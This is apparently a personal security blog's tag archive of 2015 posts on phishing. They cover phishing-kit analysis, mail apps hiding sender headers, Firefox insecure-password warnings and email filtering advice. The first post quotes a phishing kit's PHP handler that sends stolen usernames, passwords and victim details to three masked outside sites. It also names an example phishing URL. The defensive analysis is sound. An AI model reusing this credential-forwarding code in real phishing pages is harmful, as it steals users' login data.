Tag Archives: phishing attacks

STOP.THINK.CONNECT

11 October 2015

The past week was full of exiting discoveries. I got some really well-crafted phishing emails. They used the same bizarre landing page design, but showed a somewhat different method in POST processing. Since one of the landing sites was open for everyone I had the chance to create a copy of the POST processing php procedure:

…
$data = "#$user#$pass#:#$ip#$browser#$hostname";
$sites=array("http://XXXXXX0.biz/usr.php","http://www.XXXXXXX1.com/usr.php","http://XXXXXXXX2.eu/usr.php");
function writeit($data,$site) { 
 global $textHos;
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ),
    );
    $context  = stream_context_create($options);
    $result = file_get_contents($site, false, $context);    
}
foreach ($sites as $site) {
    writeit($data,$site);
}

Most of the phishing sites I analyzed in the past months send an email message with username and password to the bad guys. In this case username and password are forwarded to 3 sites for further processing.

I checked the phishing landing pages with VirusTotal.com but found in most cases that the sites were not rated malicious. Even after 5 days only 10 of 65 scanners classify the pages as malicious or phishing site.

What surprised me was that most of the pages were listed on Blacklist databases. Check the landing page in a phishing mail with e.g. IP INDETAIL. It’s very likely that the site is already listed on a Blacklist.

And it’s really remarkable that browsers do not check blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant, unfortunately no one seems to be interested in creating actionable knowledge from it.

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the The Anti-Phishing Working Group (APWG) and National Cyber Security Alliance (NCSA). The campaign’s slogan is Keeping the web a safer place for everyone. The campaign provides lots of information about Two Factor Authentication and tips for safe usage of the internet. Take a look at the funny video clips.

Take care, and have a good week.

Mail apps facilitate phishing attacks

2 October 2015

Yesterday I received a really well-crafted phishing mail:

Phishing mail viewed in Windows Phone app

Windows Phone Mail App View

When viewed with mail apps on smartphones or tablets this well-made phishing mails look like the real thing.

Viewed with MS Outlook or a web mail client the sender information in the header makes it crystal clear that this email is a phishing attempt:

Phishing mail viewed in Outlook

Phishing mail viewed in Outlook

In my opinion most of the phishing attacks are easy to detect if email apps would offer the option to display at least the full <From> tag from the email header.

It’s hard to understand why Google, Apple and Microsoft make their customer’s life more difficult than necessary.

Have a good weekend!

Firefox Browser Console provides valuable hints on Phishing Sites

11 July 2015

When a serious company requests login data the network connection is always secured. Clear indicator of a secured network connection is that the URL starts with the https protocol. In addition, the certificate information besides the URL provides reliable information about the company and the site which runs the service.

Secure Connection Indicators

Secure Connection Indicators

The missing https protocol and certificate information in phishing URLs like http://videoservicesmiami.com/bolu/HOTMAILFILES/HOTMAILFILES/login.srf.htm is a clear indicator that someone tries to trick you.

Firefox Browser Console is a useful little helper in identifying phishing sites. Programmers use an input box of type password when they ask for a password. With this the Firefox programmers defined a simple rule:

Password fields present on an insecure (http://) page are a security risk.

When Firefox loads a phishing site the code on the site is inspected. Firefox detects an input box of type password and outputs a warning on the Browser Console because the network connection is not secured:

Firefox Browser Console Security Warning

Firefox Browser Console Security Warning. Click to enlarge.

I would appreciate it if the Firefox programmers would warn the users with a message box of such security risks, and block loading of such sites. This would be a great step forward because malicious URLs are often difficult to recognize in emails.

Take care!

Nomination for the “Most-Slanting-Phishing-Site-of-the-Year” award

10 July 2015

I am receiving about 20 phishing mails a week. Most attackers invest a lot of effort in their counterfeits but, sometimes they overshoot the mark. My July candidate for the Most-Slanting-Phishing-Site-of-the-Year award is:

Most-Slanting-Phishing-Site-of-the-Year award - July 2015 candidate

Most-Slanting-Phishing-Site-of-the-Year award – July 2015 candidate

Earlier this week the Italian company Hacking Team was hacked. The attackers made more than 400GB of confidential company data available to the public. The leaked data included tools and exploits provided by the company to carry out attacks, among them a new Flash Player zero day affecting Flash Player up to version 18.0.0.194.

Two critical vulnerabilities in as many weeks, that’s really annoying. The problem with the latest Flash Player attacks is that the payload is hidden in Flash Player SWF files. Thus, basically every SWF file might carry a malicious payload…

… It’s definitely time to solve the Flash Player problems once and for all.

Have a good weekend.

Some thoughts on Email Filtering and Anti-Spam

14 March 2015

I fully agree with Paul Kubler’s post ‘Here’s Why Email Filtering Needs to be More than Just Anti-Spam’ published last Friday on LIFARS.

In my opinion we have to tackle this problem from at least 3 sides.

First of all it is time for the e-mail providers to take action. In my post about free email providers I showed, that none of the major German providers use properly configured anti-malware systems. I estimate that the number of phishing attacks could decrease by 90% if just the email providers would reject all mails with malicious content or attachments when they are deposited.

Second, it is important to spark the users attention. Awareness campaigns, with well-made but harmless phishing attacks, and direct feedback, will raise the attention and save a lot of hassle. Train the users in identifying the main features of phishing attacks and the proper counter measures to take.

Finally, we can implement some technical measures to support the users to act correctly in the case of malicious email:

  • Configure your email client program to display all mails in plain text.

In this case all links are displayed in plain text. Even an unexperienced user can see that the link is not part of the sender’s domain and most likely part of a cyber-attack.

Sample Phishing Mail displayed in plain text format

Sample Phishing Mail displayed in plain text forma

  • Turn off attachment preview.

A previewer must read an attachment for display. In the worst case malicious code included in an attachment is executed and compromises your system.

  • Turn on SmartScreen filtering.

SmartScreen Filtering will block access to know malicious sites.

That’s it for today. Have a good weekend.